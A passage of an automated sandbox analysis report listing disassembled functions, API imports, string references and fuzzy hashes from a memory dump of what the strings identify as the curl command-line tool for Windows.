fclose.API-MS-WIN-CRT-STDIO-L1-1-0 ref: 00007FF7F8D0C602

Strings

%s%s%s, xrefs: 00007FF7F8D0C17F
%s%s, xrefs: 00007FF7F8D0C209
%s:%d: warning: '%s' uses unquoted white space in the line that may cause side-effects!, xrefs: 00007FF7F8D0C3FC
%s:%d: warning: '%s' %s, xrefs: 00007FF7F8D0C598
_curlrc, xrefs: 00007FF7F8D0C135
<stdin>, xrefs: 00007FF7F8D0C576

Memory Dump Source

Source File: 00000004.00000002.375582930.00007FF7F8D01000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF7F8D00000, based on PE: true

Associated: 00000004.00000002.375579996.00007FF7F8D00000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.375589399.00007FF7F8D4B000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.375593291.00007FF7F8D66000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.375595742.00007FF7F8D67000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_7ff7f8d00000_bpzs.jbxd

Similarity

API ID: isspace$free$__acrt_iob_func__swprintf_lfclosefopenmalloc$FileModuleName
String ID: %s%s$%s%s%s$%s:%d: warning: '%s' %s$%s:%d: warning: '%s' uses unquoted white space in the line that may cause side-effects!$<stdin>$_curlrc
API String ID: 1811837637-7833359
Opcode ID: 5a5d829313511d1aecd25e1e472f6a65b41391b9b081f2ac45a1bd6481061ecc
Instruction ID: a5ecec0b03b949f0d481516b38388c40e4c6c656d4168daa2a19b0cb578860ac
Opcode Fuzzy Hash: 5a5d829313511d1aecd25e1e472f6a65b41391b9b081f2ac45a1bd6481061ecc
Instruction Fuzzy Hash: DFF10522A0D68281FB25AB65905427DFB90AF5D7D0F880131DABD077D9DF2CE40DB3A8

Uniqueness

Uniqueness Score: -1.00%

Function 00007FF7F8D1BF2C Relevance: 35.2, APIs: 28, Instructions: 228
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Part of subcall function 00007FF7F8D23740: EnterCriticalSection.API-MS-WIN-CORE-SYNCH-L1-1-0(?,?,?,00007FF7F8D1BF55), ref: 00007FF7F8D23768
Part of subcall function 00007FF7F8D23740: LeaveCriticalSection.API-MS-WIN-CORE-SYNCH-L1-1-0(?,?,?,00007FF7F8D1BF55), ref: 00007FF7F8D2377B
Part of subcall function 00007FF7F8D23740: CloseHandle.API-MS-WIN-CORE-HANDLE-L1-1-0(?,?,?,00007FF7F8D1BF55), ref: 00007FF7F8D23788
Part of subcall function 00007FF7F8D23740: free.API-MS-WIN-CRT-HEAP-L1-1-0(?,?,?,00007FF7F8D1BF55), ref: 00007FF7F8D237E4

free.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 00007FF7F8D1BFE9
free.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 00007FF7F8D1C009
free.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 00007FF7F8D1C029
free.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 00007FF7F8D1C049
free.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 00007FF7F8D1C069
free.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 00007FF7F8D1C089
free.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 00007FF7F8D1C0A9
free.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 00007FF7F8D1C0C9
free.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 00007FF7F8D1C0E9
free.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 00007FF7F8D1C109
free.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 00007FF7F8D1C129
free.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 00007FF7F8D1C149
free.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 00007FF7F8D1C169
free.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 00007FF7F8D1C189
free.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 00007FF7F8D1C1A9
free.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 00007FF7F8D1C1C9
free.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 00007FF7F8D1C1E9
free.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 00007FF7F8D1C209
free.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 00007FF7F8D1C229
free.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 00007FF7F8D1C249
free.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 00007FF7F8D1C269
free.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 00007FF7F8D1C289
free.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 00007FF7F8D1C2A9
free.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 00007FF7F8D1C2C9
free.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 00007FF7F8D1C2E9
free.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 00007FF7F8D1C309

Part of subcall function 00007FF7F8D1BECC: free.API-MS-WIN-CRT-HEAP-L1-1-0(?,?,?,00007FF7F8D1C31C), ref: 00007FF7F8D1BF04

free.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 00007FF7F8D1C35C

Part of subcall function 00007FF7F8D23E74: free.API-MS-WIN-CRT-HEAP-L1-1-0(?,?,?,00007FF7F8D242C9,?,?,?,00007FF7F8D19C81), ref: 00007FF7F8D23E95
Part of subcall function 00007FF7F8D23E74: free.API-MS-WIN-CRT-HEAP-L1-1-0(?,?,?,00007FF7F8D242C9), ref: 00007FF7F8D23EB0
Part of subcall function 00007FF7F8D23E74: free.API-MS-WIN-CRT-HEAP-L1-1-0(?,?,?,00007FF7F8D242C9), ref: 00007FF7F8D23ECB
Part of subcall function 00007FF7F8D23E74: free.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 00007FF7F8D23EE6
Part of subcall function 00007FF7F8D23E74: free.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 00007FF7F8D23F01
Part of subcall function 00007FF7F8D23E74: free.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 00007FF7F8D23F1C

free.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 00007FF7F8D1C390

Memory Dump Source

Source File: 00000004.00000002.375582930.00007FF7F8D01000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF7F8D00000, based on PE: true

Associated: 00000004.00000002.375579996.00007FF7F8D00000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.375589399.00007FF7F8D4B000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.375593291.00007FF7F8D66000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.375595742.00007FF7F8D67000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_7ff7f8d00000_bpzs.jbxd

Similarity

API ID: free$CriticalSection$CloseEnterHandleLeave
String ID:
API String ID: 3321414516-0
Opcode ID: aad36844fae27e8025c053615da7fb6f5f43d4945fb349eb040299e002739a75
Instruction ID: 6b362e05df5de9d15198c3e808e76de49e4ad0b75c20442184b63d5645a4807e
Opcode Fuzzy Hash: aad36844fae27e8025c053615da7fb6f5f43d4945fb349eb040299e002739a75
Instruction Fuzzy Hash: 5BC19E25709E85D2E718EB31F9502BCE324FF9DB90F880131DA7E477918F2CA4699798

Uniqueness

Uniqueness Score: -1.00%

Function 00007FF7F8D08037 Relevance: 33.4, APIs: 14, Strings: 5, Instructions: 172
fileCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Part of subcall function 00007FF7F8D0DE50: malloc.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 00007FF7F8D0DEA1

free.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 00007FF7F8D0804C
_stat64.API-MS-WIN-CRT-FILESYSTEM-L1-1-0 ref: 00007FF7F8D080C6
fopen.API-MS-WIN-CRT-STDIO-L1-1-0 ref: 00007FF7F8D080ED
_fileno.API-MS-WIN-CRT-STDIO-L1-1-0 ref: 00007FF7F8D0B05D
fclose.API-MS-WIN-CRT-STDIO-L1-1-0 ref: 00007FF7F8D0B079
free.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 00007FF7F8D0B0B2
free.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 00007FF7F8D0B0D0
free.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 00007FF7F8D0B0DB
_close.API-MS-WIN-CRT-STDIO-L1-1-0 ref: 00007FF7F8D0B0ED

Strings

Can't open '%s'!, xrefs: 00007FF7F8D080FC
bad output glob!, xrefs: 00007FF7F8D0805F
(%d) Failed writing body, xrefs: 00007FF7F8D0B08F
9J, xrefs: 00007FF7F8D0B09E
@), xrefs: 00007FF7F8D0B277

Memory Dump Source

Source File: 00000004.00000002.375582930.00007FF7F8D01000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF7F8D00000, based on PE: true

Associated: 00000004.00000002.375579996.00007FF7F8D00000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.375589399.00007FF7F8D4B000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.375593291.00007FF7F8D66000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.375595742.00007FF7F8D67000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_7ff7f8d00000_bpzs.jbxd

Similarity

API ID: free$_close_fileno_stat64fclosefopenmalloc
String ID: (%d) Failed writing body$Can't open '%s'!$bad output glob!$9J$@)
API String ID: 2165304770-1746080394
Opcode ID: 99d32ef605fa3b9ff88bb0ba5616cb84ea505791f7a657f5b48d51e664de20aa
Instruction ID: 756210b55e83d1a740cc96c0ab72bf52d981f3e0cef0d09b2747622610dfad26
Opcode Fuzzy Hash: 99d32ef605fa3b9ff88bb0ba5616cb84ea505791f7a657f5b48d51e664de20aa
Instruction Fuzzy Hash: 39719222A0EB4285FB50EB61D45457DE365FF88B80FD90435CA7E476D8DE3CE448A3A8

Uniqueness

Uniqueness Score: -1.00%

Function 00007FF7F8D07EE5 Relevance: 33.4, APIs: 11, Strings: 8, Instructions: 146
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

_fileno.API-MS-WIN-CRT-STDIO-L1-1-0 ref: 00007FF7F8D0B05D
fclose.API-MS-WIN-CRT-STDIO-L1-1-0 ref: 00007FF7F8D0B079
free.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 00007FF7F8D0B0B2
free.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 00007FF7F8D0B0D0
free.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 00007FF7F8D0B0DB
_close.API-MS-WIN-CRT-STDIO-L1-1-0 ref: 00007FF7F8D0B0ED
free.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 00007FF7F8D0B21D
free.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 00007FF7F8D0B268
free.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 00007FF7F8D0B280
free.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 00007FF7F8D0B28E
free.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 00007FF7F8D0B29C

Strings

%s%s%s, xrefs: 00007FF7F8D0B00C
HTTPS-proxy has similar options --proxy-cacert and --proxy-insecure., xrefs: 00007FF7F8D0AFF7
curl: (%d) %s, xrefs: 00007FF7F8D0AFD9
If this HTTPS server uses a certificate signed by a CA represented in the bundle, the certificate verification probably failed due to a problem with the certificate (it might be expired, or the name might not match the domain name in the URL).If you'd like, xrefs: 00007FF7F8D0AFFE
(%d) Failed writing body, xrefs: 00007FF7F8D0B08F
9J, xrefs: 00007FF7F8D0B09E
More details here: https://curl.haxx.se/docs/sslcerts.htmlcurl performs SSL certificate verification by default, using a "bundle" of Certificate Authority (CA) public keys (CA certs). If the default bundle file isn't adequate, you can specify an alternate , xrefs: 00007FF7F8D0B005
@), xrefs: 00007FF7F8D0B277

Memory Dump Source

Source File: 00000004.00000002.375582930.00007FF7F8D01000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF7F8D00000, based on PE: true

Associated: 00000004.00000002.375579996.00007FF7F8D00000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.375589399.00007FF7F8D4B000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.375593291.00007FF7F8D66000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.375595742.00007FF7F8D67000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_7ff7f8d00000_bpzs.jbxd

Similarity

API ID: free$_close_filenofclose
String ID: %s%s%s$(%d) Failed writing body$HTTPS-proxy has similar options --proxy-cacert and --proxy-insecure.$If this HTTPS server uses a certificate signed by a CA represented in the bundle, the certificate verification probably failed due to a problem with the certificate (it might be expired, or the name might not match the domain name in the URL).If you'd like$More details here: https://curl.haxx.se/docs/sslcerts.htmlcurl performs SSL certificate verification by default, using a "bundle" of Certificate Authority (CA) public keys (CA certs). If the default bundle file isn't adequate, you can specify an alternate $curl: (%d) %s$9J$@)
API String ID: 1641916826-1623358720
Opcode ID: 2b274b5f009787d902611c34b5034b512ada662721e6fca31db2dc03b4029cc9
Instruction ID: b19d9f932479c6684edf4471919656eed5ef690614287eea970d7fdba9004c88
Opcode Fuzzy Hash: 2b274b5f009787d902611c34b5034b512ada662721e6fca31db2dc03b4029cc9
Instruction Fuzzy Hash: F0618F22E0EB4285FB20EB61D45457DE765EF88B40FD40035C97E576D8CE3CE448A3A8

Uniqueness

Uniqueness Score: -1.00%

Function 00007FF7F8D1A1F0 Relevance: 31.4, APIs: 9, Strings: 8, Instructions: 1648COMMON

Download Yara Rule

Strings

Set-Cookie:, xrefs: 00007FF7F8D1B7A5
ALL, xrefs: 00007FF7F8D1B636
identity, xrefs: 00007FF7F8D1B46D
CURLOPT_SSL_VERIFYHOST no longer supports 1 as value!, xrefs: 00007FF7F8D1A5D0
FLUSH, xrefs: 00007FF7F8D1B705
CURLOPT_WRITEDATA, xrefs: 00007FF7F8D1A207
SESS, xrefs: 00007FF7F8D1B686
RELOAD, xrefs: 00007FF7F8D1B727

Memory Dump Source

Source File: 00000004.00000002.375582930.00007FF7F8D01000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF7F8D00000, based on PE: true

Associated: 00000004.00000002.375579996.00007FF7F8D00000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.375589399.00007FF7F8D4B000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.375593291.00007FF7F8D66000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.375595742.00007FF7F8D67000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_7ff7f8d00000_bpzs.jbxd

Similarity

API ID:
String ID: ALL$CURLOPT_SSL_VERIFYHOST no longer supports 1 as value!$CURLOPT_WRITEDATA$FLUSH$RELOAD$SESS$Set-Cookie:$identity
API String ID: 0-1681163804
Opcode ID: 397c92050f609cb4687807bec7fe33dee7c952afbf463943dd618ed831257fd8
Instruction ID: 0c2019c2221ccd17c4e85f69bf2c70b16c6718a7a0d4986cf3d1a83d8fb1b769
Opcode Fuzzy Hash: 397c92050f609cb4687807bec7fe33dee7c952afbf463943dd618ed831257fd8
Instruction Fuzzy Hash: ABF2EA32A0EE42CAF7696B38D54437CF651EF48760F985036C26E066D4DE3DA40DB7A8

Uniqueness

Uniqueness Score: -1.00%

Function 00007FF7F8D4864C Relevance: 24.1, APIs: 16, Instructions: 92
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

__scrt_initialize_crt.LIBCMT ref: 00007FF7F8D48660

Part of subcall function 00007FF7F8D48820: __vcrt_initialize.LIBVCRUNTIME ref: 00007FF7F8D48842

__scrt_fastfail.LIBCMT ref: 00007FF7F8D4866E

Part of subcall function 00007FF7F8D48BB4: IsProcessorFeaturePresent.KERNEL32 ref: 00007FF7F8D48BD0
Part of subcall function 00007FF7F8D48BB4: RtlCaptureContext.KERNEL32 ref: 00007FF7F8D48BFC
Part of subcall function 00007FF7F8D48BB4: RtlLookupFunctionEntry.KERNEL32 ref: 00007FF7F8D48C16
Part of subcall function 00007FF7F8D48BB4: RtlVirtualUnwind.KERNEL32 ref: 00007FF7F8D48C57
Part of subcall function 00007FF7F8D48BB4: IsDebuggerPresent.KERNEL32 ref: 00007FF7F8D48CAB
Part of subcall function 00007FF7F8D48BB4: SetUnhandledExceptionFilter.KERNEL32 ref: 00007FF7F8D48CCC
Part of subcall function 00007FF7F8D48BB4: UnhandledExceptionFilter.KERNEL32 ref: 00007FF7F8D48CD7

__scrt_acquire_startup_lock.LIBCMT ref: 00007FF7F8D4867C
__scrt_fastfail.LIBCMT ref: 00007FF7F8D48693
_initterm_e.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 00007FF7F8D486B4
__scrt_release_startup_lock.LIBCMT ref: 00007FF7F8D486F0
__scrt_is_nonwritable_in_current_image.LIBCMT ref: 00007FF7F8D48706
__scrt_is_nonwritable_in_current_image.LIBCMT ref: 00007FF7F8D48736
_register_thread_local_exe_atexit_callback.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 00007FF7F8D48742
__p___argv.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 00007FF7F8D48747
__p___argc.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 00007FF7F8D4874F
_get_initial_narrow_environment.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 00007FF7F8D48757
__scrt_is_managed_app.LIBCMT ref: 00007FF7F8D4876B
exit.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 00007FF7F8D48776
_cexit.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 00007FF7F8D48780
__scrt_uninitialize_crt.LIBCMT ref: 00007FF7F8D48789

Memory Dump Source

Source File: 00000004.00000002.375582930.00007FF7F8D01000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF7F8D00000, based on PE: true

Associated: 00000004.00000002.375579996.00007FF7F8D00000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.375589399.00007FF7F8D4B000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.375593291.00007FF7F8D66000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.375595742.00007FF7F8D67000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_7ff7f8d00000_bpzs.jbxd

Similarity

API ID: ExceptionFilterPresentUnhandled__scrt_fastfail__scrt_is_nonwritable_in_current_image$CaptureContextDebuggerEntryFeatureFunctionLookupProcessorUnwindVirtual__p___argc__p___argv__scrt_acquire_startup_lock__scrt_initialize_crt__scrt_is_managed_app__scrt_release_startup_lock__scrt_uninitialize_crt__vcrt_initialize_cexit_get_initial_narrow_environment_initterm_e_register_thread_local_exe_atexit_callbackexit
String ID:
API String ID: 2533591713-0
Opcode ID: 7c9171cdf213f1ead3ea1ca360b17c99cef2f0455ee1a27f3977a47252cda938
Instruction ID: 37b4068fc84ef0ad4a9391a47f1241975808ff3a551ee0a537dd95bfaab33cd2
Opcode Fuzzy Hash: 7c9171cdf213f1ead3ea1ca360b17c99cef2f0455ee1a27f3977a47252cda938
Instruction Fuzzy Hash: 36316B21B0C64741FB54BB60A4523B9D290AF4D7C4FD810B5DA3D072D7DE2EA80CA6F8

Uniqueness

Uniqueness Score: -1.00%

Function 00007FF7F8D18220 Relevance: 21.2, APIs: 7, Strings: 5, Instructions: 216
networkCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Part of subcall function 00007FF7F8D17B0C: htons.WS2_32 ref: 00007FF7F8D17B5A

_errno.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 00007FF7F8D1829C
_errno.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 00007FF7F8D182A4

Part of subcall function 00007FF7F8D12C90: GetLastError.API-MS-WIN-CORE-ERRORHANDLING-L1-1-0(?,?,?,?,?,?,?,?,?,?,?,00007FF7F8D16B46), ref: 00007FF7F8D12CAA
Part of subcall function 00007FF7F8D12C90: _errno.API-MS-WIN-CRT-RUNTIME-L1-1-0(?,?,?,?,?,?,?,?,?,?,?,00007FF7F8D16B46), ref: 00007FF7F8D12CB2
Part of subcall function 00007FF7F8D12C90: __sys_nerr.API-MS-WIN-CRT-RUNTIME-L1-1-0(?,?,?,?,?,?,?,?,?,?,?,00007FF7F8D16B46), ref: 00007FF7F8D12CC9
Part of subcall function 00007FF7F8D12C90: strerror.API-MS-WIN-CRT-RUNTIME-L1-1-0(?,?,?,?,?,?,?,?,?,?,?,00007FF7F8D16B46), ref: 00007FF7F8D12CD5
Part of subcall function 00007FF7F8D12C90: strncpy.API-MS-WIN-CRT-STRING-L1-1-0(?,?,?,?,?,?,?,?,?,?,?,00007FF7F8D16B46), ref: 00007FF7F8D12CE7
Part of subcall function 00007FF7F8D12C90: _errno.API-MS-WIN-CRT-RUNTIME-L1-1-0(?,?,?,?,?,?,?,?,?,?,?,00007FF7F8D16B46), ref: 00007FF7F8D12D91
Part of subcall function 00007FF7F8D12C90: _errno.API-MS-WIN-CRT-RUNTIME-L1-1-0(?,?,?,?,?,?,?,?,?,?,?,00007FF7F8D16B46), ref: 00007FF7F8D12D9C
Part of subcall function 00007FF7F8D12C90: GetLastError.API-MS-WIN-CORE-ERRORHANDLING-L1-1-0(?,?,?,?,?,?,?,?,?,?,?,00007FF7F8D16B46), ref: 00007FF7F8D12DA5
Part of subcall function 00007FF7F8D12C90: SetLastError.API-MS-WIN-CORE-ERRORHANDLING-L1-1-0(?,?,?,?,?,?,?,?,?,?,?,00007FF7F8D16B46), ref: 00007FF7F8D12DB1

Part of subcall function 00007FF7F8D1875C: closesocket.WS2_32 ref: 00007FF7F8D1879D

setsockopt.WS2_32 ref: 00007FF7F8D1832D
WSAGetLastError.WS2_32 ref: 00007FF7F8D18337

Strings

Trying %s..., xrefs: 00007FF7F8D182D8
Immediate connect fail for %s: %s, xrefs: 00007FF7F8D184F2
sa_addr inet_ntop() failed with errno %d: %s, xrefs: 00007FF7F8D182BA
TCP_NODELAY set, xrefs: 00007FF7F8D18362
Could not set TCP_NODELAY: %s, xrefs: 00007FF7F8D1834C

Memory Dump Source

Source File: 00000004.00000002.375582930.00007FF7F8D01000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF7F8D00000, based on PE: true

Associated: 00000004.00000002.375579996.00007FF7F8D00000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.375589399.00007FF7F8D4B000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.375593291.00007FF7F8D66000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.375595742.00007FF7F8D67000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_7ff7f8d00000_bpzs.jbxd

Similarity

API ID: _errno$ErrorLast$__sys_nerrclosesockethtonssetsockoptstrerrorstrncpy
String ID: Trying %s...$Could not set TCP_NODELAY: %s$Immediate connect fail for %s: %s$TCP_NODELAY set$sa_addr inet_ntop() failed with errno %d: %s
API String ID: 3129811291-816182543
Opcode ID: 29ca6eedd6e6390e1dc2f895d19ce7819a36ae8a2340718d6449bec0a300babe
Instruction ID: ec787653c205d265c6892a325b053347b5f0278d3c5c38868053886b4418d6a6
Opcode Fuzzy Hash: 29ca6eedd6e6390e1dc2f895d19ce7819a36ae8a2340718d6449bec0a300babe
Instruction Fuzzy Hash: A7918162B0CA4282FB50EB25A4441AAE390FF4D7A4FC40531EE6D477D5DE3CE408E7A8

Uniqueness

Uniqueness Score: -1.00%

Function 00007FF7F8D17B90 Relevance: 21.1, APIs: 8, Strings: 4, Instructions: 108
networkCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

getpeername.WS2_32 ref: 00007FF7F8D17BFA
_errno.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 00007FF7F8D17C97
_errno.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 00007FF7F8D17C9F

Part of subcall function 00007FF7F8D12C90: FormatMessageA.API-MS-WIN-CORE-LOCALIZATION-L1-2-0 ref: 00007FF7F8D12D23
Part of subcall function 00007FF7F8D12C90: __swprintf_l.LIBCMT ref: 00007FF7F8D12D43

_errno.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 00007FF7F8D17D13
_errno.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 00007FF7F8D17D1B
WSAGetLastError.WS2_32 ref: 00007FF7F8D17C04

Part of subcall function 00007FF7F8D12C90: GetLastError.API-MS-WIN-CORE-ERRORHANDLING-L1-1-0(?,?,?,?,?,?,?,?,?,?,?,00007FF7F8D16B46), ref: 00007FF7F8D12CAA
Part of subcall function 00007FF7F8D12C90: _errno.API-MS-WIN-CRT-RUNTIME-L1-1-0(?,?,?,?,?,?,?,?,?,?,?,00007FF7F8D16B46), ref: 00007FF7F8D12CB2
Part of subcall function 00007FF7F8D12C90: __sys_nerr.API-MS-WIN-CRT-RUNTIME-L1-1-0(?,?,?,?,?,?,?,?,?,?,?,00007FF7F8D16B46), ref: 00007FF7F8D12CC9
Part of subcall function 00007FF7F8D12C90: strerror.API-MS-WIN-CRT-RUNTIME-L1-1-0(?,?,?,?,?,?,?,?,?,?,?,00007FF7F8D16B46), ref: 00007FF7F8D12CD5
Part of subcall function 00007FF7F8D12C90: strncpy.API-MS-WIN-CRT-STRING-L1-1-0(?,?,?,?,?,?,?,?,?,?,?,00007FF7F8D16B46), ref: 00007FF7F8D12CE7
Part of subcall function 00007FF7F8D12C90: _errno.API-MS-WIN-CRT-RUNTIME-L1-1-0(?,?,?,?,?,?,?,?,?,?,?,00007FF7F8D16B46), ref: 00007FF7F8D12D91
Part of subcall function 00007FF7F8D12C90: _errno.API-MS-WIN-CRT-RUNTIME-L1-1-0(?,?,?,?,?,?,?,?,?,?,?,00007FF7F8D16B46), ref: 00007FF7F8D12D9C
Part of subcall function 00007FF7F8D12C90: GetLastError.API-MS-WIN-CORE-ERRORHANDLING-L1-1-0(?,?,?,?,?,?,?,?,?,?,?,00007FF7F8D16B46), ref: 00007FF7F8D12DA5
Part of subcall function 00007FF7F8D12C90: SetLastError.API-MS-WIN-CORE-ERRORHANDLING-L1-1-0(?,?,?,?,?,?,?,?,?,?,?,00007FF7F8D16B46), ref: 00007FF7F8D12DB1

Part of subcall function 00007FF7F8D17B0C: htons.WS2_32 ref: 00007FF7F8D17B5A

getsockname.WS2_32 ref: 00007FF7F8D17C50
WSAGetLastError.WS2_32 ref: 00007FF7F8D17C5A

Strings

getpeername() failed with errno %d: %s, xrefs: 00007FF7F8D17C16
getsockname() failed with errno %d: %s, xrefs: 00007FF7F8D17C6C
ssrem inet_ntop() failed with errno %d: %s, xrefs: 00007FF7F8D17CB5
ssloc inet_ntop() failed with errno %d: %s, xrefs: 00007FF7F8D17D31

Memory Dump Source

Source File: 00000004.00000002.375582930.00007FF7F8D01000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF7F8D00000, based on PE: true

Associated: 00000004.00000002.375579996.00007FF7F8D00000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.375589399.00007FF7F8D4B000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.375593291.00007FF7F8D66000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.375595742.00007FF7F8D67000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_7ff7f8d00000_bpzs.jbxd

Similarity

API ID: _errno$ErrorLast$FormatMessage__swprintf_l__sys_nerrgetpeernamegetsocknamehtonsstrerrorstrncpy
String ID: getpeername() failed with errno %d: %s$getsockname() failed with errno %d: %s$ssloc inet_ntop() failed with errno %d: %s$ssrem inet_ntop() failed with errno %d: %s
API String ID: 3284209413-670633250
Opcode ID: c6b38466c530f37faf4ed88757355d348b3aaf1595b3fb91bddf2c8d98cb8f0a
Instruction ID: fa8c943d422a086883ed1cb1619b33880cf3c731aab1e1e3ca5562c1f38375fd
Opcode Fuzzy Hash: c6b38466c530f37faf4ed88757355d348b3aaf1595b3fb91bddf2c8d98cb8f0a
Instruction Fuzzy Hash: 44519361A08A8686FB10BB35E4402F9F361EF4CB94F844032DA6D0769ADF3CE54DD7A4

Uniqueness

Uniqueness Score: -1.00%

Function 00007FF7F8D0CFC4 Relevance: 17.7, APIs: 3, Strings: 7, Instructions: 157
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

__swprintf_l.LIBCMT ref: 00007FF7F8D0D07C
__swprintf_l.LIBCMT ref: 00007FF7F8D0D126
free.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 00007FF7F8D0D1C7

Strings

functionpointer, xrefs: 00007FF7F8D0D0BB
curl_easy_setopt(hnd, %s, %s);, xrefs: 00007FF7F8D0D1A9
%s set to a %s, xrefs: 00007FF7F8D0D16C
curl_easy_setopt(hnd, %s, "%s");, xrefs: 00007FF7F8D0D199
%ldL, xrefs: 00007FF7F8D0D06B
objectpointer, xrefs: 00007FF7F8D0D0EF
(curl_off_t)%I64d, xrefs: 00007FF7F8D0D112

Memory Dump Source
